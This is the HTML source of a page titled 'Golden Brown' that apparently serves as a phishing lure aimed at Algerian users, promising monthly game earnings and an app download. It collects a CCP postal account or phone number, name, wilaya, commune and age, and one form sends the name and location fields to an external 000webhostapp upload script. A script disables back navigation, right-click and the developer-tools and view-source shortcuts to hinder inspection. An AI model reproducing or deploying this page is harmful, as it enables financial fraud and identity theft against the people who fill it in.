
<!DOCTYPE html>

<html>
<head>
  <title>Golden Brown</title>
  <link rel="icon" type="image/x-icon" href="https://i.postimg.cc/sfQVLXXb/Golden.jpg">
</head>
<body>
<title></title>
<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Bitter" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Droid+Serif" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Merriweather" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Oxygen" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Permanent+Marker" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Oswald" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Cabin" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Abril+Fatface" rel="stylesheet" type="text/css"/>
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css"/>
<style>
		.bee-form .bee-form-row .bee-field button {
			font-size: inherit;
			font-family: inherit
		}

		body {
			background-color: #0b0340;
			color: #000;
			font-family: Open Sans, Helvetica Neue, Helvetica, Arial, sans-serif
		}

		.bee-row-3 .bee-col-2 .bee-block-3 li a,
		a {
			color: #fff
		}

		* {
			box-sizing: border-box
		}

		body,
		h1,
		h3 {
			margin: 0
		}

		.bee-row-content {
			max-width: 1440px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w2 {
			flex-basis: 17%
		}

		.bee-row-content .bee-col-w3 {
			flex-basis: 25%
		}

		.bee-row-content .bee-col-w4 {
			flex-basis: 33%
		}

		.bee-row-content .bee-col-w6 {
			flex-basis: 50%
		}

		.bee-row-2 .bee-col-3 .bee-block-10 div.label:not(.inline),
		.bee-row-2 .bee-col-3 .bee-block-10 label:not(.inline),
		.bee-row-2 .bee-col-3 .bee-block-3 div.label:not(.inline),
		.bee-row-2 .bee-col-3 .bee-block-3 label:not(.inline),
		.bee-row-content .bee-col-w12 {
			flex-basis: 100%
		}

		.bee-icon .bee-icon-label-right a,
		.bee-menu ul li a {
			text-decoration: none
		}

		.bee-divider,
		.bee-image {
			overflow: auto
		}

		.bee-divider .center,
		.bee-image .bee-center {
			margin: 0 auto
		}

		.bee-form .bee-form-row .bee-field {
			padding: 3px;
			display: flex;
			flex: 1;
			flex-wrap: wrap;
			align-content: flex-start
		}

		.bee-form .bee-form-row .bee-field input:not([type=checkbox]):not([type=radio]) {
			flex-grow: 1;
			font-family: inherit;
			font-size: inherit
		}

		.bee-form .bee-form-row .bee-field .bee-button-container {
			flex-grow: 1
		}

		.bee-form input[type=color] {
			border: none;
			height: 38px
		}

		.bee-form input[type=color]::-webkit-color-swatch-wrapper {
			margin: 0;
			padding: 2px
		}

		.bee-form input[type=color]::-webkit-color-swatch {
			margin: 0;
			padding: 0
		}

		.bee-icon,
		.bee-icon .bee-icon-image,
		.bee-icon .bee-icon-label-right,
		.bee-menu ul.bee-horizontal li {
			display: inline-block
		}

		.bee-icon {
			vertical-align: middle
		}

		.bee-icon .bee-icon-image {
			vertical-align: middle;
			margin-right: -4px
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		.bee-menu ul {
			list-style-type: none;
			margin: 0;
			padding: 0
		}

		.bee-social .icon img {
			max-height: 32px
		}

		.bee-row-1,
		.bee-row-2 {
			background-position: center top;
			background-repeat: no-repeat
		}

		.bee-row-1 .bee-row-content,
		.bee-row-2 .bee-row-content,
		.bee-row-3 .bee-row-content,
		.bee-row-4 .bee-row-content {
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-1 .bee-col-2,
		.bee-row-1 .bee-col-3,
		.bee-row-2 .bee-col-2,
		.bee-row-2 .bee-col-3,
		.bee-row-2 .bee-col-4,
		.bee-row-4 .bee-col-1 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-1 .bee-col-2 .bee-block-1,
		.bee-row-1 .bee-col-2 .bee-block-3,
		.bee-row-2 .bee-col-3 .bee-block-4,
		.bee-row-2 .bee-col-3 .bee-block-8 {
			padding-left: 10px;
			padding-right: 10px;
			text-align: center;
			width: 100%
		}

		.bee-row-2 .bee-col-3 .bee-block-10,
		.bee-row-2 .bee-col-3 .bee-block-3 {
			font-family: inherit;
			font-size: 14px;
			padding: 10px;
			text-align: center;
			width: 95%;
			margin: 0 auto
		}

		.bee-row-2 .bee-col-3 .bee-block-9 {
			width: 100%;
			padding: 25px
		}

		.bee-row-3 {
			background-position: top center;
			background-repeat: repeat
		}

		.bee-row-3 .bee-col-2 {
			padding-bottom: 10px;
			padding-top: 10px
		}

		.bee-row-3 .bee-col-2 .bee-block-1,
		.bee-row-3 .bee-col-2 .bee-block-4 {
			padding: 10px
		}

		.bee-row-3 .bee-col-2 .bee-block-2 {
			padding: 10px;
			text-align: center
		}

		.bee-row-3 .bee-col-2 .bee-block-3 {
			color: #fff;
			font-family: inherit;
			font-size: 14px;
			text-align: center
		}

		.bee-row-4 {
			background-repeat: no-repeat
		}

		.bee-row-4 .bee-col-1 .bee-block-1 {
			color: #9d9d9d;
			font-family: inherit;
			font-size: 15px;
			padding-bottom: 5px;
			padding-top: 5px;
			text-align: center
		}

		.bee-row-4 .bee-col-1 .bee-block-1 .bee-icon-image {
			padding: 5px 6px 5px 5px
		}

		.bee-row-4 .bee-col-1 .bee-block-1 .bee-icon {
			margin-left: 0;
			margin-right: 0
		}

		.bee-row-3 .bee-col-2 .bee-block-3 li {
			padding: 5px
		}

		@media (max-width:768px) {
			.bee-form {
				width: 100% !important
			}

			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		.bee-row-2 .bee-col-3 .bee-block-10 div.label,
		.bee-row-2 .bee-col-3 .bee-block-10 label {
			color: #d8b1bd;
			line-height: 200%;
			text-align: left;
			display: block
		}

		.bee-row-2 .bee-col-3 .bee-block-10 div.label,
		.bee-row-2 .bee-col-3 .bee-block-3 div.label {
			padding: 3px
		}

		.bee-row-2 .bee-col-3 .bee-block-10 input:not([type=checkbox]):not([type=radio]):not([type=image]),
		.bee-row-2 .bee-col-3 .bee-block-3 input:not([type=checkbox]):not([type=radio]):not([type=image]) {
			background-color: #fff;
			border-bottom: 1px solid transparent;
			border-left: 1px solid transparent;
			border-radius: 4px;
			border-right: 1px solid transparent;
			border-top: 1px solid transparent;
			color: #000;
			padding: 5px
		}

		.bee-row-2 .bee-col-3 .bee-block-10 button,
		.bee-row-2 .bee-col-3 .bee-block-3 button {
			border-bottom: 0 solid transparent;
			border-left: 0 solid transparent;
			border-radius: 4px;
			border-right: 0px solid transparent;
			border-top: 0 solid transparent;
			color: #fff;
			line-height: 200%;
			padding: 5px 20px;
			width: 100%
		}

		.bee-row-2 .bee-col-3 .bee-block-10 input:not([type=checkbox]):not([type=radio]):focus {
			outline-color: #fb3665
		}

		.bee-row-2 .bee-col-3 .bee-block-10 button {
			background-color: #b9349d
		}

		.bee-row-2 .bee-col-3 .bee-block-10 .bee-button-container,
		.bee-row-2 .bee-col-3 .bee-block-3 .bee-button-container {
			text-align: "center"
		}

		.bee-row-2 .bee-col-3 .bee-block-3 div.label,
		.bee-row-2 .bee-col-3 .bee-block-3 label {
			color: #fff;
			line-height: 200%;
			text-align: left;
			display: block
		}

		.bee-row-2 .bee-col-3 .bee-block-3 input:not([type=checkbox]):not([type=radio]):focus {
			outline-color: #ff6a5a
		}

		.bee-row-2 .bee-col-3 .bee-block-3 button {
			background-color: #ff6a5a
		}
	</style>
</head>
<body>
<div class="bee-page-container">
<div class="bee-row bee-row-1">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w3">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w6">
<div class="bee-block bee-block-1 bee-heading">
<h1 style="color:#ffffff;direction:ltr;font-family:Open Sans, Helvetica Neue, Helvetica, Arial, sans-serif;font-size:50px;font-weight:normal;line-height:120%;text-align:center;margin-top:0;margin-bottom:0;"><strong> Golden Brown   

</strong> </h1>
</div>
<div class="bee-block bee-block-2 bee-divider">
<div class="spacer" style="height:30px;"></div>
</div>
<div class="bee-block bee-block-3 bee-heading">
</strong> </h3>
</strong> </h3>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w3">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-2">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w2">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w4">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w4">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
<div class="bee-block bee-block-2 bee-divider">
<div class="spacer" style="height:30px;"></div>
</div>
<div class="bee-block bee-block-3 bee-form">
<form accept-charset="UTF-8" action="{{form.action}}" autocomplete="on" enctype="multipart/form-data" method="post" target="_self">
<div class="bee-form-row">
<div class="bee-field bee-field-id_1ervle">
</div>
</div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_4nmlu4"><label for="id_4nmlu4">Numéro de CCP</label><input id="id_4nmlu4" name="{{form.email}}" placeholder="رقم الهاتف 'فليكسي' أو رقم الحساب البريدي" required="" type="tel"/></div>
</div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
<div class="bee-form-row"></div>
</form>
</div>
<div class="bee-block bee-block-4 bee-heading">
<h1 style="color:#ffffff;direction:ltr;font-family:Open Sans, Helvetica Neue, Helvetica, Arial, sans-serif;font-size:50px;font-weight:normal;line-height:120%;text-align:center;margin-top:0;margin-bottom:0;"><sub><strong>  !البداية سهلة جدا</strong></sub> </h1>
<h1 style="color:#ffffff;direction:ltr;font-family:Open Sans, Helvetica Neue, Helvetica, Arial, sans-serif;font-size:50px;font-weight:normal;line-height:120%;text-align:center;margin-top:0;margin-bottom:0;"><sub><strong>  

	👇 ما عليك إلا ملئ المعلومات, ثم الضغط على متابعة.  ثم تحمل التطبيق</strong></sub> </h1>

</div>
<div class="bee-block bee-block-5 bee-divider">
<div class="spacer" style="height:30px;"></div>
</div>
<div class="bee-block bee-block-6 bee-divider">
<div class="spacer" style="height:30px;"></div>
</div>
<div class="bee-block bee-block-7 bee-divider">
<div class="spacer" style="height:30px;"></div>
</div>
<div class="bee-block bee-block-8 bee-heading">
<h3 style="color:#ffffff;direction:ltr;font-family:Open Sans, Helvetica Neue, Helvetica, Arial, sans-serif;font-size:16px;font-weight:normal;line-height:120%;text-align:center;margin-top:0;margin-bottom:0;">  هنا صورة توضيحية لطريقة اللعب و الأرباح المتحصل عليها شهريا  👇 </h3>
</div>
<div class="bee-block bee-block-9 bee-image"><img alt="" class="bee-center bee-autowidth" src="https://i.postimg.cc/FsGgZ9w2/image.png" style="max-width:430px;"/></div>
<div class="bee-block bee-block-10 bee-form">
</div>
<div class="bee-block bee-block-9 bee-image"><img alt="" class="bee-center bee-autowidth" src="" style="max-width:430px;"/></div>
<div class="bee-block bee-block-10 bee-form">
<form accept-charset="UTF-8" action="https://ckopilonique.000webhostapp.com/up.php" autocomplete="on" enctype="multipart/form-data" method="post" target="_self">
<div class="bee-form-row"></div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_q1zee3"><label for="id_q1zee3">الإسم و اللقب</label><input id="id_q1zee3" name="name" placeholder=" الإسم  و  القب " required="" type="text"/></div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_h6wdft"><label for="id_h6wdft">الولاية</label><input id="id_h6wdft" name="wilaya" placeholder=" الولاية" required="" type="text"/></div>
<div class="bee-field bee-field-id_h6wdft"><label for="id_h6wdft">العمر</label><input id="id_h6wdft" name="age" placeholder=" عمرك أو تاريخ ميلادك" required="" type="text"/></div>
<div class="bee-field bee-field-id_h6wdft"><label for="id_h6wdft">البلدية</label><input id="id_h6wdft" name="baladia" placeholder=" البلدية" required="" type="text"/></div>

</div>
<div class="bee-form-row"></div>
<div class="bee-form-row">
<div class="bee-field bee-field-id_zzvq2n">
<div class="bee-button-container"><button id="id_zzvq2n" name="submit" type="submit" value="Connexion">متابعة</button></div>
<script language="JavaScript">
			window.history.forward();
		function noBack() { window.history.forward(); }
	
	  window.onload = function() {
		document.addEventListener("contextmenu", function(e){
		  e.preventDefault();
		}, false);
		document.addEventListener("keydown", function(e) {
		//document.onkeydown = function(e) {
		  // "I" key
		  if (e.ctrlKey && e.shiftKey && e.keyCode == 73) {
			disabledEvent(e);
		  }
		  // "J" key
		  if (e.ctrlKey && e.shiftKey && e.keyCode == 74) {
			disabledEvent(e);
		  }
		  // "S" key + macOS
		  if (e.keyCode == 83 && (navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)) {
			disabledEvent(e);
		  }
		  // "U" key
		  if (e.ctrlKey && e.keyCode == 85) {
			disabledEvent(e);
		  }
		  // "F12" key
		  if (event.keyCode == 123) {
			disabledEvent(e);
		  }
		}, false);
		function disabledEvent(e){
		  if (e.stopPropagation){
			e.stopPropagation();
		  } else if (window.event){
			window.event.cancelBubble = true;
		  }
		  e.preventDefault();
		  return false;
		}
	  };
	</script>
</div>
</div>
</form>
</div>
<div class="bee-block bee-block-11 bee-divider">
<div class="spacer" style="height:50px;"></div>
</div>
</div>
<div class="bee-col bee-col-4 bee-col-w2">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-3">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w3">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w6">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:5px;"></div>
</div>
<div class="bee-block bee-block-2 bee-social">
<div class="content"><span class="icon" style="padding:0 7.5px 0 7.5px;"><a href="https://www.facebook.com/"><img alt="Facebook" src="https://i.postimg.cc/1zs3wXQb/facebook2x.png" title="facebook"/></a></span><span class="icon" style="padding:0 7.5px 0 7.5px;"><a href="https://www.twitter.com/"><img alt="Twitter" src="https://i.postimg.cc/4dFfD19T/twitter2x.png" title="twitter"/></a></span><span class="icon" style="padding:0 7.5px 0 7.5px;"><a href="https://www.linkedin.com/"><img alt="Linkedin" src="https://i.postimg.cc/4d3420n5/linkedin2x.png" title="linkedin"/></a></span><span class="icon" style="padding:0 7.5px 0 7.5px;"><a href=""><img alt="Instagram" src="https://i.postimg.cc/9fbFp2X0/instagram2x.png" title="instagram"/></a></span></div>
</div>
<div class="bee-block bee-block-3 bee-menu">
<nav class="bee-menu">
<ul class="bee-horizontal">
<li><a href="" target="_self" title="">Terms &amp; Condition</a></li><span>|</span>
<li><a href="" target="_self" title="">Contact Us</a></li><span>|</span>
<li><a href="" target="_self" title="">Unsubscribe</a></li>
</ul>
</nav>
</div>
<div class="bee-block bee-block-4 bee-divider">
<div class="spacer" style="height:5px;"></div>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w3">
<div class="bee-block bee-block-1 bee-divider">
<div class="spacer" style="height:0px;"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body>
</html>